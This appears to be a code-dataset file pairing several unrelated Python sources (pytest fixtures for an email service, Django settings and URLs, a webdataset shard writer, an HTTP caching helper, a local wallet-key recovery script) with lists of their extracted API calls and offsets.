return is_found
| [
"flow.core.abstract_filesystem.splitpath",
"os.path.basename",
"os.path.join",
"azure.storage.blob.BlockBlobService"
] | [((1577, 1596), 'flow.core.abstract_filesystem.splitpath', 'splitpath', (['uri_path'], {}), '(uri_path)\n', (1586, 1596), False, 'from flow.core.abstract_filesystem import AbstractFilesystem, splitpath\n'), ((596, 720), 'azure.storage.blob.BlockBlobService', 'BlockBlobService', ([], {'account_name': "context.settings['azure_account_name']", 'account_key': "context.settings['azure_account_key']"}), "(account_name=context.settings['azure_account_name'],\n account_key=context.settings['azure_account_key'])\n", (612, 720), False, 'from azure.storage.blob import BlockBlobService\n'), ((1617, 1645), 'os.path.join', 'path.join', (['root', 'folder_name'], {}), '(root, folder_name)\n', (1626, 1645), False, 'from os import path\n'), ((3793, 3825), 'os.path.join', 'path.join', (['uri_path', 'folder_name'], {}), '(uri_path, folder_name)\n', (3802, 3825), False, 'from os import path\n'), ((3743, 3766), 'os.path.basename', 'path.basename', (['uri_path'], {}), '(uri_path)\n', (3756, 3766), False, 'from os import path\n')] |
import asyncio
import pytest
import re
import uuid
from aiohttp.test_utils import teardown_test_loop
from aioredis import create_redis
from arq import ArqRedis, Worker
from atoolbox.db import prepare_database
from atoolbox.db.helpers import DummyPgPool
from atoolbox.test_utils import DummyServer, create_dummy_server
from buildpg import Values, asyncpg
from morpheus.app.main import create_app
from morpheus.app.models import EmailSendModel, SendMethod
from morpheus.app.settings import Settings
from morpheus.app.views import get_create_company_id
from morpheus.app.worker import startup as worker_startup, worker_functions
from . import dummy_server
def pytest_addoption(parser):
parser.addoption('--reuse-db', action='store_true', default=False, help='keep the existing database if it exists')
pg_settings = dict(pg_dsn='postgres://postgres:waffle@localhost:5432/morpheus_test')
@pytest.fixture(scope='session', name='clean_db')
def _fix_clean_db(request):
# loop fixture has function scope so can't be used here.
settings = Settings(**pg_settings)
loop = asyncio.new_event_loop()
loop.run_until_complete(prepare_database(settings, not request.config.getoption('--reuse-db')))
teardown_test_loop(loop)
@pytest.fixture(name='db_conn')
async def _fix_db_conn(loop, settings, clean_db):
conn = await asyncpg.connect_b(dsn=settings.pg_dsn, loop=loop)
tr = conn.transaction()
await tr.start()
await conn.execute("set client_min_messages = 'log'")
yield conn
await tr.rollback()
await conn.close()
@pytest.yield_fixture
async def redis(loop, settings):
addr = settings.redis_settings.host, settings.redis_settings.port
redis = await create_redis(addr, db=settings.redis_settings.database, encoding='utf8', commands_factory=ArqRedis)
await redis.flushdb()
yield redis
redis.close()
await redis.wait_closed()
@pytest.fixture(name='dummy_server')
async def _fix_dummy_server(aiohttp_server):
ctx = {'mandrill_subaccounts': {}}
return await create_dummy_server(aiohttp_server, extra_routes=dummy_server.routes, extra_context=ctx)
@pytest.fixture
def settings(tmpdir, dummy_server: DummyServer):
return Settings(
**pg_settings,
auth_key='testing-key',
test_output=str(tmpdir),
pdf_generation_url=dummy_server.server_name + '/generate.pdf',
mandrill_key='good-mandrill-testing-key',
log_level='ERROR',
mandrill_url=dummy_server.server_name + '/mandrill',
mandrill_timeout=0.5,
host_name=None,
click_host_name='click.example.com',
messagebird_key='good-messagebird-testing-key',
messagebird_url=dummy_server.server_name + '/messagebird',
stats_token='test-token',
max_request_stats=10,
)
@pytest.fixture(name='cli')
async def _fix_cli(loop, test_client, settings, db_conn, redis):
async def pre_startup(app):
app.update(redis=redis, pg=DummyPgPool(db_conn))
app = create_app(settings=settings)
app.update(pg=DummyPgPool(db_conn), webhook_auth_key=b'testing')
app.on_startup.insert(0, pre_startup)
cli = await test_client(app)
cli.server.app['morpheus_api'].root = f'http://localhost:{cli.server.port}/'
return cli
@pytest.fixture
def send_email(cli, worker):
async def _send_message(status_code=201, **extra):
data = dict(
uid=str(uuid.uuid4()),
main_template='<body>\n{{{ message }}}\n</body>',
company_code='foobar',
from_address='<NAME> <<EMAIL>>',
method='email-test',
subject_template='test message',
context={'message': 'this is a test'},
recipients=[{'address': '<EMAIL>'}],
)
# assert all(e in data for e in extra), f'{extra.keys()} fields not in {data.keys()}'
data.update(**extra)
r = await cli.post('/send/email/', json=data, headers={'Authorization': 'testing-key'})
assert r.status == status_code
await worker.run_check()
if len(data['recipients']) != 1:
return NotImplemented
else:
return re.sub(r'[^a-zA-Z0-9\-]', '', f'{data["uid"]}-{data["recipients"][0]["address"]}')
return _send_message
@pytest.fixture
def send_sms(cli, worker):
async def _send_message(**extra):
data = dict(
uid=str(uuid.uuid4()),
main_template='this is a test {{ variable }}',
company_code='foobar',
from_name='FooBar',
method='sms-test',
context={'variable': 'apples'},
recipients=[{'number': '07896541236'}],
)
# assert all(e in data for e in extra), f'{extra.keys()} fields not in {data.keys()}'
data.update(**extra)
r = await cli.post('/send/sms/', json=data, headers={'Authorization': 'testing-key'})
assert r.status == 201
await worker.run_check()
return data['uid'] + '-447896541236'
return _send_message
@pytest.yield_fixture(name='worker_ctx')
async def _fix_worker_ctx(settings, db_conn):
ctx = dict(settings=settings, pg=DummyPgPool(db_conn))
await worker_startup(ctx)
yield ctx
await asyncio.gather(ctx['session'].close(), ctx['mandrill'].close(), ctx['messagebird'].close())
@pytest.yield_fixture(name='worker')
async def _fix_worker(cli, worker_ctx):
worker = Worker(
functions=worker_functions, redis_pool=cli.server.app['redis'], burst=True, poll_delay=0.01, ctx=worker_ctx
)
yield worker
await worker.close()
@pytest.fixture(name='call_send_emails')
def _fix_call_send_emails(db_conn):
async def run(**kwargs):
base_kwargs = dict(
uid=str(uuid.uuid4()),
subject_template='hello',
company_code='test',
from_address='<EMAIL>',
method=SendMethod.email_mandrill,
recipients=[],
)
m = EmailSendModel(**dict(base_kwargs, **kwargs))
company_id = await get_create_company_id(db_conn, m.company_code)
group_id = await db_conn.fetchval_b(
'insert into message_groups (:values__names) values :values returning id',
values=Values(
uuid=m.uid,
company_id=company_id,
message_method=m.method.value,
from_email=m.from_address.email,
from_name=m.from_address.name,
),
)
return group_id, company_id, m
return run
| [
"morpheus.app.worker.startup",
"aioredis.create_redis",
"atoolbox.db.helpers.DummyPgPool",
"asyncio.new_event_loop",
"morpheus.app.settings.Settings",
"uuid.uuid4",
"arq.Worker",
"aiohttp.test_utils.teardown_test_loop",
"buildpg.Values",
"morpheus.app.main.create_app",
"atoolbox.test_utils.creat... | [((896, 944), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""session"""', 'name': '"""clean_db"""'}), "(scope='session', name='clean_db')\n", (910, 944), False, 'import pytest\n'), ((1241, 1271), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""db_conn"""'}), "(name='db_conn')\n", (1255, 1271), False, 'import pytest\n'), ((1903, 1938), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""dummy_server"""'}), "(name='dummy_server')\n", (1917, 1938), False, 'import pytest\n'), ((2809, 2835), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""cli"""'}), "(name='cli')\n", (2823, 2835), False, 'import pytest\n'), ((5024, 5063), 'pytest.yield_fixture', 'pytest.yield_fixture', ([], {'name': '"""worker_ctx"""'}), "(name='worker_ctx')\n", (5044, 5063), False, 'import pytest\n'), ((5320, 5355), 'pytest.yield_fixture', 'pytest.yield_fixture', ([], {'name': '"""worker"""'}), "(name='worker')\n", (5340, 5355), False, 'import pytest\n'), ((5585, 5624), 'pytest.fixture', 'pytest.fixture', ([], {'name': '"""call_send_emails"""'}), "(name='call_send_emails')\n", (5599, 5624), False, 'import pytest\n'), ((1049, 1072), 'morpheus.app.settings.Settings', 'Settings', ([], {}), '(**pg_settings)\n', (1057, 1072), False, 'from morpheus.app.settings import Settings\n'), ((1084, 1108), 'asyncio.new_event_loop', 'asyncio.new_event_loop', ([], {}), '()\n', (1106, 1108), False, 'import asyncio\n'), ((1213, 1237), 'aiohttp.test_utils.teardown_test_loop', 'teardown_test_loop', (['loop'], {}), '(loop)\n', (1231, 1237), False, 'from aiohttp.test_utils import teardown_test_loop\n'), ((3001, 3030), 'morpheus.app.main.create_app', 'create_app', ([], {'settings': 'settings'}), '(settings=settings)\n', (3011, 3030), False, 'from morpheus.app.main import create_app\n'), ((5409, 5528), 'arq.Worker', 'Worker', ([], {'functions': 'worker_functions', 'redis_pool': "cli.server.app['redis']", 'burst': '(True)', 'poll_delay': '(0.01)', 'ctx': 'worker_ctx'}), "(functions=worker_functions, redis_pool=cli.server.app['redis'],\n burst=True, poll_delay=0.01, ctx=worker_ctx)\n", (5415, 5528), False, 'from arq import ArqRedis, Worker\n'), ((1339, 1388), 'buildpg.asyncpg.connect_b', 'asyncpg.connect_b', ([], {'dsn': 'settings.pg_dsn', 'loop': 'loop'}), '(dsn=settings.pg_dsn, loop=loop)\n', (1356, 1388), False, 'from buildpg import Values, asyncpg\n'), ((1708, 1811), 'aioredis.create_redis', 'create_redis', (['addr'], {'db': 'settings.redis_settings.database', 'encoding': '"""utf8"""', 'commands_factory': 'ArqRedis'}), "(addr, db=settings.redis_settings.database, encoding='utf8',\n commands_factory=ArqRedis)\n", (1720, 1811), False, 'from aioredis import create_redis\n'), ((2040, 2132), 'atoolbox.test_utils.create_dummy_server', 'create_dummy_server', (['aiohttp_server'], {'extra_routes': 'dummy_server.routes', 'extra_context': 'ctx'}), '(aiohttp_server, extra_routes=dummy_server.routes,\n extra_context=ctx)\n', (2059, 2132), False, 'from atoolbox.test_utils import DummyServer, create_dummy_server\n'), ((5179, 5198), 'morpheus.app.worker.startup', 'worker_startup', (['ctx'], {}), '(ctx)\n', (5193, 5198), True, 'from morpheus.app.worker import startup as worker_startup, worker_functions\n'), ((3049, 3069), 'atoolbox.db.helpers.DummyPgPool', 'DummyPgPool', (['db_conn'], {}), '(db_conn)\n', (3060, 3069), False, 'from atoolbox.db.helpers import DummyPgPool\n'), ((4158, 4244), 're.sub', 're.sub', (['"""[^a-zA-Z0-9\\\\-]"""', '""""""', 'f"""{data[\'uid\']}-{data[\'recipients\'][0][\'address\']}"""'], {}), '(\'[^a-zA-Z0-9\\\\-]\', \'\',\n f"{data[\'uid\']}-{data[\'recipients\'][0][\'address\']}")\n', (4164, 4244), False, 'import re\n'), ((5147, 5167), 'atoolbox.db.helpers.DummyPgPool', 'DummyPgPool', (['db_conn'], {}), '(db_conn)\n', (5158, 5167), False, 'from atoolbox.db.helpers import DummyPgPool\n'), ((6028, 6074), 'morpheus.app.views.get_create_company_id', 'get_create_company_id', (['db_conn', 'm.company_code'], {}), '(db_conn, m.company_code)\n', (6049, 6074), False, 'from morpheus.app.views import get_create_company_id\n'), ((2968, 2988), 'atoolbox.db.helpers.DummyPgPool', 'DummyPgPool', (['db_conn'], {}), '(db_conn)\n', (2979, 2988), False, 'from atoolbox.db.helpers import DummyPgPool\n'), ((3414, 3426), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (3424, 3426), False, 'import uuid\n'), ((4391, 4403), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (4401, 4403), False, 'import uuid\n'), ((5738, 5750), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (5748, 5750), False, 'import uuid\n'), ((6226, 6366), 'buildpg.Values', 'Values', ([], {'uuid': 'm.uid', 'company_id': 'company_id', 'message_method': 'm.method.value', 'from_email': 'm.from_address.email', 'from_name': 'm.from_address.name'}), '(uuid=m.uid, company_id=company_id, message_method=m.method.value,\n from_email=m.from_address.email, from_name=m.from_address.name)\n', (6232, 6366), False, 'from buildpg import Values, asyncpg\n')] |
from django.conf.urls import include, url
from django.contrib import admin
from django.views.generic import View
urlpatterns = [
url(r'^client/', include('client.urls', namespace = 'client', app_name = 'client')),
url(r'^app/', include('app.urls', namespace = 'app', app_name = 'app')),
url('', include('django.contrib.auth.urls', namespace='auth')),
url('', include('social.apps.django_app.urls', namespace='social')),
url(r'^admin/', include(admin.site.urls)),
] | [
"django.conf.urls.include"
] | [((149, 210), 'django.conf.urls.include', 'include', (['"""client.urls"""'], {'namespace': '"""client"""', 'app_name': '"""client"""'}), "('client.urls', namespace='client', app_name='client')\n", (156, 210), False, 'from django.conf.urls import include, url\n'), ((233, 285), 'django.conf.urls.include', 'include', (['"""app.urls"""'], {'namespace': '"""app"""', 'app_name': '"""app"""'}), "('app.urls', namespace='app', app_name='app')\n", (240, 285), False, 'from django.conf.urls import include, url\n'), ((304, 357), 'django.conf.urls.include', 'include', (['"""django.contrib.auth.urls"""'], {'namespace': '"""auth"""'}), "('django.contrib.auth.urls', namespace='auth')\n", (311, 357), False, 'from django.conf.urls import include, url\n'), ((370, 428), 'django.conf.urls.include', 'include', (['"""social.apps.django_app.urls"""'], {'namespace': '"""social"""'}), "('social.apps.django_app.urls', namespace='social')\n", (377, 428), False, 'from django.conf.urls import include, url\n'), ((449, 473), 'django.conf.urls.include', 'include', (['admin.site.urls'], {}), '(admin.site.urls)\n', (456, 473), False, 'from django.conf.urls import include, url\n')] |
"""
imutils/big/make_shards.py
Generate one or more webdataset-compatible tar archive shards from an image classification dataset.
Based on script: https://github.com/tmbdev-archive/webdataset-examples/blob/7f56e9a8b978254c06aa0a98572a1331968b0eb3/makeshards.py
Added on: Sunday March 6th, 2022
Example usage:
python "/media/data/jacob/GitHub/image-utils/imutils/big/make_shards.py" \
--subsets=train,val,test \
--maxsize='1e9' \
--maxcount=50000 \
--shard_dir="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/webdataset" \
--catalog_dir="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/catalog" \
--debug
"""
import sys
import os
import os.path
import random
import argparse
from torchvision import datasets
import webdataset as wds
import numpy as np
import os
from typing import Optional, Tuple, Any, Dict
from tqdm import trange, tqdm
import tarfile
tarfile.DEFAULT_FORMAT = tarfile.GNU_FORMAT
import webdataset as wds
# from imutils.big.datamodule import Herbarium2022DataModule, Herbarium2022Dataset
from imutils.ml.data.datamodule import Herbarium2022DataModule, Herbarium2022Dataset
def read_file_binary(fname):
"Read a binary file from disk."
with open(fname, "rb") as stream:
return stream.read()
all_keys = set()
def prepare_sample(dataset, index, subset: str="train", filekey: bool=False) -> Dict[str, Any]:
image_binary, label, metadata = dataset[index]
key = metadata["catalog_number"]
assert key not in all_keys
all_keys.add(key)
xkey = key if filekey else "%07d" % index
sample = {"__key__": xkey,
"image.jpg": image_binary}
if subset != "test":
assert label == dataset.targets[index]
sample["label.cls"] = int(label)
return sample
def write_dataset(catalog_dir: Optional[str]=None,
shard_dir: Optional[str]=None,
subset="train",
maxsize=1e9,
maxcount=100000,
limit_num_samples: Optional[int]=np.inf,
filekey: bool=False,
dataset=None):
if dataset is None:
datamodule = Herbarium2022DataModule(catalog_dir=catalog_dir,
num_workers=4,
image_reader=read_file_binary,
remove_transforms=True)
datamodule.setup()
dataset = datamodule.get_dataset(subset=subset)
num_samples = len(dataset)
print(f"With subset={subset}, Total num_samples: {num_samples}")
if limit_num_samples < num_samples:
num_samples = limit_num_samples
print(f"Limiting this run to num_samples: {num_samples}")
indices = list(range(num_samples))
os.makedirs(shard_dir, exist_ok=True)
pattern = os.path.join(shard_dir, f"herbarium_2022-{subset}-%06d.tar")
with wds.ShardWriter(pattern, maxsize=maxsize, maxcount=maxcount) as sink:
for i in tqdm(indices, desc=f"idx(Total={num_samples})"):
sample = prepare_sample(dataset, index=i, subset=subset, filekey=filekey)
sink.write(sample)
return dataset, indices
def parse_args() -> argparse.Namespace:
parser = argparse.ArgumentParser("""Generate sharded dataset from supervised image dataset.""")
parser.add_argument("--subsets", default="train,val,test", help="which subsets to write")
parser.add_argument(
"--filekey", action="store_true", help="use file as key (default: index)"
)
parser.add_argument("--maxsize", type=float, default=1e9)
parser.add_argument("--maxcount", type=float, default=100000)
parser.add_argument(
"--shard_dir",
default="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/webdataset",
help="directory where shards are written"
)
parser.add_argument(
"--catalog_dir",
default="/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/catalog",
help="directory containing csv versions of the original train & test metadata json files from herbarium 2022",
)
parser.add_argument("--debug", action="store_true", default=False,
help="Provide this boolean flag to produce a debugging shard dataset of only a maximum of 200 samples per data subset. [TODO] Switch to temp directories when this flag is passed.")
args = parser.parse_args()
return args
def main(args):
# args = parse_args()
assert args.maxsize > 10000000 # Shards must be a minimum of 10+ MB
assert args.maxcount < 1000000 # Shards must contain a maximum of 1,000,000 samples each
limit_num_samples = 200 if args.debug else np.inf
# if not os.path.isdir(os.path.join(args.data, "train")):
# print(f"{args.data}: should be directory containing ImageNet", file=sys.stderr)
# print(f"suitable as argument for torchvision.datasets.ImageNet(...)", file=sys.stderr)
# sys.exit(1)
# if not os.path.isdir(os.path.join(args.shards, ".")):
# print(f"{args.shards}: should be a writable destination directory for shards", file=sys.stderr)
# sys.exit(1)
subsets = args.subsets.split(",")
for subset in tqdm(subsets, leave=True, desc=f"Processing {len(subsets)} subsets"):
# print("# subset", subset)
dataset, indices = write_dataset(catalog_dir=args.catalog_dir,
shard_dir=args.shard_dir,
subset=subset,
maxsize=args.maxsize,
maxcount=args.maxcount,
limit_num_samples=limit_num_samples,
filekey=args.filekey)
CATALOG_DIR = "/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/catalog"
# SHARD_DIR = "/media/data_cifs/projects/prj_fossils/users/jacob/data/herbarium_2022/webdataset"
if __name__ == "__main__":
args = parse_args()
main(args)
written_files = os.listdir(args.shard_dir)
files_per_subset = {"train":[],
"val":[],
"test":[]}
for subset,v in files_per_subset.items():
files_per_subset[subset] = len([f for f in written_files if subset in f])
from rich import print as pp
print(f"SUCCESS! TARGET SHARD DIR CONTAINS THE FOLLOWING:")
pp(files_per_subset)
| [
"os.listdir",
"argparse.ArgumentParser",
"os.makedirs",
"imutils.ml.data.datamodule.Herbarium2022DataModule",
"tqdm.tqdm",
"os.path.join",
"rich.print",
"webdataset.ShardWriter"
] | [((2524, 2561), 'os.makedirs', 'os.makedirs', (['shard_dir'], {'exist_ok': '(True)'}), '(shard_dir, exist_ok=True)\n', (2535, 2561), False, 'import os\n'), ((2573, 2633), 'os.path.join', 'os.path.join', (['shard_dir', 'f"""herbarium_2022-{subset}-%06d.tar"""'], {}), "(shard_dir, f'herbarium_2022-{subset}-%06d.tar')\n", (2585, 2633), False, 'import os\n'), ((2954, 3041), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""Generate sharded dataset from supervised image dataset."""'], {}), "(\n 'Generate sharded dataset from supervised image dataset.')\n", (2977, 3041), False, 'import argparse\n'), ((5479, 5505), 'os.listdir', 'os.listdir', (['args.shard_dir'], {}), '(args.shard_dir)\n', (5489, 5505), False, 'import os\n'), ((5792, 5812), 'rich.print', 'pp', (['files_per_subset'], {}), '(files_per_subset)\n', (5794, 5812), True, 'from rich import print as pp\n'), ((2031, 2153), 'imutils.ml.data.datamodule.Herbarium2022DataModule', 'Herbarium2022DataModule', ([], {'catalog_dir': 'catalog_dir', 'num_workers': '(4)', 'image_reader': 'read_file_binary', 'remove_transforms': '(True)'}), '(catalog_dir=catalog_dir, num_workers=4,\n image_reader=read_file_binary, remove_transforms=True)\n', (2054, 2153), False, 'from imutils.ml.data.datamodule import Herbarium2022DataModule, Herbarium2022Dataset\n'), ((2641, 2701), 'webdataset.ShardWriter', 'wds.ShardWriter', (['pattern'], {'maxsize': 'maxsize', 'maxcount': 'maxcount'}), '(pattern, maxsize=maxsize, maxcount=maxcount)\n', (2656, 2701), True, 'import webdataset as wds\n'), ((2722, 2769), 'tqdm.tqdm', 'tqdm', (['indices'], {'desc': 'f"""idx(Total={num_samples})"""'}), "(indices, desc=f'idx(Total={num_samples})')\n", (2726, 2769), False, 'from tqdm import trange, tqdm\n')] |
# -*- coding: utf-8 -*-
# Copyright (c) 2018-2021, earthobservations developers.
# Distributed under the MIT License. See LICENSE for more info.
import os
from io import BytesIO
from typing import List, Optional, Union
from fsspec.implementations.cached import WholeFileCacheFileSystem
from fsspec.implementations.http import HTTPFileSystem
from wetterdienst.util.cache import (
FSSPEC_CLIENT_KWARGS,
WD_CACHE_DISABLE,
CacheExpiry,
cache_dir,
)
class NetworkFilesystemManager:
"""
Manage multiple FSSPEC instances keyed by cache expiration time.
"""
filesystems = {}
@staticmethod
def resolve_ttl(ttl: Union[int, CacheExpiry]):
ttl_name = ttl
ttl_value = ttl
if isinstance(ttl, CacheExpiry):
ttl_name = ttl.name
ttl_value = ttl.value
return ttl_name, ttl_value
@classmethod
def register(cls, ttl=CacheExpiry.NO_CACHE):
ttl_name, ttl_value = cls.resolve_ttl(ttl)
key = f"ttl-{ttl_name}"
real_cache_dir = os.path.join(cache_dir, "fsspec", key)
filesystem_real = HTTPFileSystem(use_listings_cache=True, client_kwargs=FSSPEC_CLIENT_KWARGS)
if WD_CACHE_DISABLE or ttl is CacheExpiry.NO_CACHE:
filesystem_effective = filesystem_real
else:
filesystem_effective = WholeFileCacheFileSystem(
fs=filesystem_real, cache_storage=real_cache_dir, expiry_time=ttl_value
)
cls.filesystems[key] = filesystem_effective
@classmethod
def get(cls, ttl=CacheExpiry.NO_CACHE):
ttl_name, ttl_value = cls.resolve_ttl(ttl)
key = f"ttl-{ttl_name}"
if key not in cls.filesystems:
cls.register(ttl=ttl)
return cls.filesystems[key]
def list_remote_files_fsspec(url: str, ttl: CacheExpiry = CacheExpiry.FILEINDEX) -> List[str]:
"""
A function used to create a listing of all files of a given path on the server.
The default ttl with ``CacheExpiry.FILEINDEX`` is "5 minutes".
:param url: The URL which should be searched for files.
:param ttl: The cache expiration time.
:returns: A list of strings representing the files from the path.
"""
fs = HTTPFileSystem(
use_listings_cache=True,
listings_expiry_time=not WD_CACHE_DISABLE and ttl.value,
listings_cache_type="filedircache",
listings_cache_location=cache_dir,
)
return fs.find(url)
def download_file(url: str, ttl: Optional[int] = CacheExpiry.NO_CACHE) -> BytesIO:
"""
A function used to download a specified file from the server.
:param url: The url to the file on the dwd server
:param ttl: How long the resource should be cached.
:returns: Bytes of the file.
"""
filesystem = NetworkFilesystemManager.get(ttl=ttl)
payload = filesystem.cat(url)
return BytesIO(payload)
| [
"os.path.join",
"fsspec.implementations.cached.WholeFileCacheFileSystem",
"fsspec.implementations.http.HTTPFileSystem",
"io.BytesIO"
] | [((2241, 2416), 'fsspec.implementations.http.HTTPFileSystem', 'HTTPFileSystem', ([], {'use_listings_cache': '(True)', 'listings_expiry_time': '(not WD_CACHE_DISABLE and ttl.value)', 'listings_cache_type': '"""filedircache"""', 'listings_cache_location': 'cache_dir'}), "(use_listings_cache=True, listings_expiry_time=not\n WD_CACHE_DISABLE and ttl.value, listings_cache_type='filedircache',\n listings_cache_location=cache_dir)\n", (2255, 2416), False, 'from fsspec.implementations.http import HTTPFileSystem\n'), ((2900, 2916), 'io.BytesIO', 'BytesIO', (['payload'], {}), '(payload)\n', (2907, 2916), False, 'from io import BytesIO\n'), ((1041, 1079), 'os.path.join', 'os.path.join', (['cache_dir', '"""fsspec"""', 'key'], {}), "(cache_dir, 'fsspec', key)\n", (1053, 1079), False, 'import os\n'), ((1106, 1181), 'fsspec.implementations.http.HTTPFileSystem', 'HTTPFileSystem', ([], {'use_listings_cache': '(True)', 'client_kwargs': 'FSSPEC_CLIENT_KWARGS'}), '(use_listings_cache=True, client_kwargs=FSSPEC_CLIENT_KWARGS)\n', (1120, 1181), False, 'from fsspec.implementations.http import HTTPFileSystem\n'), ((1342, 1443), 'fsspec.implementations.cached.WholeFileCacheFileSystem', 'WholeFileCacheFileSystem', ([], {'fs': 'filesystem_real', 'cache_storage': 'real_cache_dir', 'expiry_time': 'ttl_value'}), '(fs=filesystem_real, cache_storage=real_cache_dir,\n expiry_time=ttl_value)\n', (1366, 1443), False, 'from fsspec.implementations.cached import WholeFileCacheFileSystem\n')] |
from pymongo import MongoClient
from bson import ObjectId
from bson.json_util import dumps
from json import loads
client = MongoClient('localhost', 27017)
IOT_DB = client.iot_db
IOT_SCHEMAS = IOT_DB.iot_schemas
IOT_DATA = IOT_DB.iot_data | [
"pymongo.MongoClient"
] | [((124, 155), 'pymongo.MongoClient', 'MongoClient', (['"""localhost"""', '(27017)'], {}), "('localhost', 27017)\n", (135, 155), False, 'from pymongo import MongoClient\n')] |
# -*- coding: utf-8 -*-
"""
Django settings for demo project.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.core.urlresolvers import reverse_lazy
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
DEBUG = True
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '__SHHH_ITS_A_SECRET__'
ALLOWED_HOSTS = []
ADMINS = []
MANAGERS = []
INTERNAL_IPS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
# To make it look nice
'bootstrap3',
# Boilerplate
'boilerplate',
# Apps
'account',
'store',
)
MIDDLEWARE = (
'django.middleware.common.BrokenLinkEmailsMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'demo.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'templates/'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.media',
'django.contrib.messages.context_processors.messages',
],
},
},
]
TEMPLATE_LOADERS = [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader'
]
LOCALE_PATHS = [
os.path.join(BASE_DIR, 'locale'),
]
WSGI_APPLICATION = 'demo.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files
MEDIA_ROOT = os.path.join(BASE_DIR, 'media/')
STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
LOGIN_URL = reverse_lazy('account:login')
| [
"os.path.abspath",
"os.path.join",
"django.core.urlresolvers.reverse_lazy"
] | [((3107, 3139), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""media/"""'], {}), "(BASE_DIR, 'media/')\n", (3119, 3139), False, 'import os\n'), ((3155, 3188), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""static/"""'], {}), "(BASE_DIR, 'static/')\n", (3167, 3188), False, 'import os\n'), ((3250, 3279), 'django.core.urlresolvers.reverse_lazy', 'reverse_lazy', (['"""account:login"""'], {}), "('account:login')\n", (3262, 3279), False, 'from django.core.urlresolvers import reverse_lazy\n'), ((2547, 2579), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""locale"""'], {}), "(BASE_DIR, 'locale')\n", (2559, 2579), False, 'import os\n'), ((443, 468), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (458, 468), False, 'import os\n'), ((2799, 2835), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""db.sqlite3"""'], {}), "(BASE_DIR, 'db.sqlite3')\n", (2811, 2835), False, 'import os\n'), ((1920, 1956), 'os.path.join', 'os.path.join', (['BASE_DIR', '"""templates/"""'], {}), "(BASE_DIR, 'templates/')\n", (1932, 1956), False, 'import os\n')] |
from Cryptodome.PublicKey import RSA
import hashlib
import json
def recover(key):
private_key_readable = key.exportKey().decode("utf-8")
public_key_readable = key.publickey().exportKey().decode("utf-8")
address = hashlib.sha224(public_key_readable.encode("utf-8")).hexdigest()
wallet_dict = {}
wallet_dict['Private Key'] = private_key_readable
wallet_dict['Public Key'] = public_key_readable
wallet_dict['Address'] = address
with open ("wallet_recovered.der", 'w') as wallet_file:
json.dump (wallet_dict, wallet_file)
print ("Wallet recovered to: wallet_recovered.der")
return (address, "wallet_recovered.der")
# Edit with your pem file
with open('privkey.pem', 'r') as f:
private_key_readable = f.read()
key = RSA.importKey(private_key_readable)
recover(key)
| [
"Cryptodome.PublicKey.RSA.importKey",
"json.dump"
] | [((769, 804), 'Cryptodome.PublicKey.RSA.importKey', 'RSA.importKey', (['private_key_readable'], {}), '(private_key_readable)\n', (782, 804), False, 'from Cryptodome.PublicKey import RSA\n'), ((525, 560), 'json.dump', 'json.dump', (['wallet_dict', 'wallet_file'], {}), '(wallet_dict, wallet_file)\n', (534, 560), False, 'import json\n')] |
'''
Stolen straight from https://stackoverflow.com/a/51337247/1224827
'''
try:
import PIL
import PIL.Image as PILimage
from PIL import ImageDraw, ImageFont, ImageEnhance
from PIL.ExifTags import TAGS, GPSTAGS
import os
import glob
except ImportError as err:
exit(err)
class Worker(object):
def __init__(self, img):
self.img = img
self.get_exif_data()
self.date =self.get_date_time()
super(Worker, self).__init__()
def get_exif_data(self):
